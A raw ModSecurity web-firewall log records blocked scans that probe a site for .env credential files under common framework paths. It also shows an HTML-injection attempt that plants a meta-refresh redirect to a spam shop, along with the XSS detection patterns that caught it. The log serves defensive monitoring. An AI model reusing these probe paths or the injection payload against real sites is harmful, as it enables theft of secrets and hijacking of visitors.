[Tue May 12 03:09:45.706629 2026] [security2:error] [pid 1730175:tid 1730195] [client 159.89.207.113:55676] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/api/.env"] [unique_id "agJ92Xo6NvB9WXx5V-5-nAAAARI"]
[Tue May 12 03:09:45.706866 2026] [security2:error] [pid 1730175:tid 1730195] [client 159.89.207.113:55676] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/api/.env"] [unique_id "agJ92Xo6NvB9WXx5V-5-nAAAARI"]
[Tue May 12 03:09:46.926164 2026] [security2:error] [pid 1691274:tid 1691297] [client 159.89.207.113:55664] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ92VfdQaraX_prmqckMQAAABY"]
[Tue May 12 03:09:46.926183 2026] [security2:error] [pid 1707624:tid 1707700] [client 159.89.207.113:55654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ92bOxS7i6i_mT2NLM0wAAAFI"]
[Tue May 12 03:09:46.926479 2026] [security2:error] [pid 1730207:tid 1730210] [client 159.89.207.113:55692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ92Tue9Sp-pIv_Bb6V6gAAAUE"]
[Tue May 12 03:09:46.949990 2026] [security2:error] [pid 1709071:tid 1709110] [client 159.89.207.113:55666] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ92bvMumyrWMfSu7qubgAAANc"]
[Tue May 12 03:09:46.975353 2026] [security2:error] [pid 1695975:tid 1695987] [client 159.89.207.113:55650] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ92dVI9ymHBxup74-QPwAAAIk"]
[Tue May 12 03:09:46.981495 2026] [security2:error] [pid 1695975:tid 1695980] [client 159.89.207.113:55706] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ92dVI9ymHBxup74-QPgAAAII"]
[Tue May 12 03:09:47.933822 2026] [security2:error] [pid 1730175:tid 1730195] [client 159.89.207.113:55676] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ92Xo6NvB9WXx5V-5-nAAAARI"]
[Tue May 12 03:09:49.990983 2026] [security2:error] [pid 1691274:tid 1691277] [client 159.89.207.113:55714] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/api/.env"] [unique_id "agJ93VfdQaraX_prmqckNAAAAAA"], referer: https://jeanboyault.fr/api/.env
[Tue May 12 03:09:49.991244 2026] [security2:error] [pid 1691274:tid 1691277] [client 159.89.207.113:55714] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/api/.env"] [unique_id "agJ93VfdQaraX_prmqckNAAAAAA"], referer: https://jeanboyault.fr/api/.env
[Tue May 12 03:09:49.995565 2026] [security2:error] [pid 1730207:tid 1730232] [client 159.89.207.113:55746] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/admin/.env"] [unique_id "agJ93Tue9Sp-pIv_Bb6V8QAAAVc"], referer: https://jeanboyault.fr/admin/.env
[Tue May 12 03:09:49.995842 2026] [security2:error] [pid 1730207:tid 1730232] [client 159.89.207.113:55746] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/admin/.env"] [unique_id "agJ93Tue9Sp-pIv_Bb6V8QAAAVc"], referer: https://jeanboyault.fr/admin/.env
[Tue May 12 03:09:50.005139 2026] [security2:error] [pid 1730175:tid 1730201] [client 159.89.207.113:55744] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/app/.env"] [unique_id "agJ93no6NvB9WXx5V-5-nwAAARg"], referer: https://jeanboyault.fr/app/.env
[Tue May 12 03:09:50.005139 2026] [security2:error] [pid 1691274:tid 1691296] [client 159.89.207.113:55766] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/laravel/.env"] [unique_id "agJ93lfdQaraX_prmqckNQAAABQ"], referer: https://jeanboyault.fr/laravel/.env
[Tue May 12 03:09:50.005168 2026] [security2:error] [pid 1707624:tid 1707689] [client 159.89.207.113:55736] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/core/.env"] [unique_id "agJ93rOxS7i6i_mT2NLM2gAAAEc"], referer: https://jeanboyault.fr/core/.env
[Tue May 12 03:09:50.005250 2026] [security2:error] [pid 1695975:tid 1695978] [client 159.89.207.113:55762] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env"] [unique_id "agJ93tVI9ymHBxup74-QQQAAAIA"], referer: https://jeanboyault.fr/.env
[Tue May 12 03:09:50.005137 2026] [security2:error] [pid 1709071:tid 1709103] [client 159.89.207.113:55726] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/backend/.env"] [unique_id "agJ93rvMumyrWMfSu7qudQAAANA"], referer: https://jeanboyault.fr/backend/.env
[Tue May 12 03:09:50.005381 2026] [security2:error] [pid 1730175:tid 1730201] [client 159.89.207.113:55744] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/app/.env"] [unique_id "agJ93no6NvB9WXx5V-5-nwAAARg"], referer: https://jeanboyault.fr/app/.env
[Tue May 12 03:09:50.005381 2026] [security2:error] [pid 1691274:tid 1691296] [client 159.89.207.113:55766] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/laravel/.env"] [unique_id "agJ93lfdQaraX_prmqckNQAAABQ"], referer: https://jeanboyault.fr/laravel/.env
[Tue May 12 03:09:50.005381 2026] [security2:error] [pid 1707624:tid 1707689] [client 159.89.207.113:55736] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/core/.env"] [unique_id "agJ93rOxS7i6i_mT2NLM2gAAAEc"], referer: https://jeanboyault.fr/core/.env
[Tue May 12 03:09:50.005438 2026] [security2:error] [pid 1695975:tid 1695978] [client 159.89.207.113:55762] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env"] [unique_id "agJ93tVI9ymHBxup74-QQQAAAIA"], referer: https://jeanboyault.fr/.env
[Tue May 12 03:09:50.005521 2026] [security2:error] [pid 1709071:tid 1709103] [client 159.89.207.113:55726] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/backend/.env"] [unique_id "agJ93rvMumyrWMfSu7qudQAAANA"], referer: https://jeanboyault.fr/backend/.env
[Tue May 12 03:09:51.267771 2026] [security2:error] [pid 1707624:tid 1707689] [client 159.89.207.113:55736] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ93rOxS7i6i_mT2NLM2gAAAEc"], referer: https://jeanboyault.fr/core/.env
[Tue May 12 03:09:51.267968 2026] [security2:error] [pid 1695975:tid 1695978] [client 159.89.207.113:55762] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ93tVI9ymHBxup74-QQQAAAIA"], referer: https://jeanboyault.fr/.env
[Tue May 12 03:09:51.268722 2026] [security2:error] [pid 1691274:tid 1691296] [client 159.89.207.113:55766] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ93lfdQaraX_prmqckNQAAABQ"], referer: https://jeanboyault.fr/laravel/.env
[Tue May 12 03:09:51.268913 2026] [security2:error] [pid 1691274:tid 1691277] [client 159.89.207.113:55714] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ93VfdQaraX_prmqckNAAAAAA"], referer: https://jeanboyault.fr/api/.env
[Tue May 12 03:09:51.284102 2026] [security2:error] [pid 1730207:tid 1730232] [client 159.89.207.113:55746] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ93Tue9Sp-pIv_Bb6V8QAAAVc"], referer: https://jeanboyault.fr/admin/.env
[Tue May 12 03:09:51.356490 2026] [security2:error] [pid 1709071:tid 1709103] [client 159.89.207.113:55726] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ93rvMumyrWMfSu7qudQAAANA"], referer: https://jeanboyault.fr/backend/.env
[Tue May 12 03:09:51.393091 2026] [security2:error] [pid 1730175:tid 1730201] [client 159.89.207.113:55744] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ93no6NvB9WXx5V-5-nwAAARg"], referer: https://jeanboyault.fr/app/.env
[Tue May 12 03:10:48.540062 2026] [security2:error] [pid 1709071:tid 1709101] [client 27.78.84.116:63862] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://tps:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-GLvMumyrWMfSu7qu-QAAAM4"]
[Tue May 12 03:10:48.547733 2026] [security2:error] [pid 1709071:tid 1709101] [client 27.78.84.116:63862] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu...."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-GLvMumyrWMfSu7qu-QAAAM4"]
[Tue May 12 03:10:48.548071 2026] [security2:error] [pid 1709071:tid 1709101] [client 27.78.84.116:63862] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "W [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-GLvMumyrWMfSu7qu-QAAAM4"]
[Tue May 12 03:10:48.550048 2026] [security2:error] [pid 1709071:tid 1709101] [client 27.78.84.116:63862] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-GLvMumyrWMfSu7qu-QAAAM4"]
[Tue May 12 03:10:48.554102 2026] [security2:error] [pid 1709071:tid 1709101] [client 27.78.84.116:63862] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag 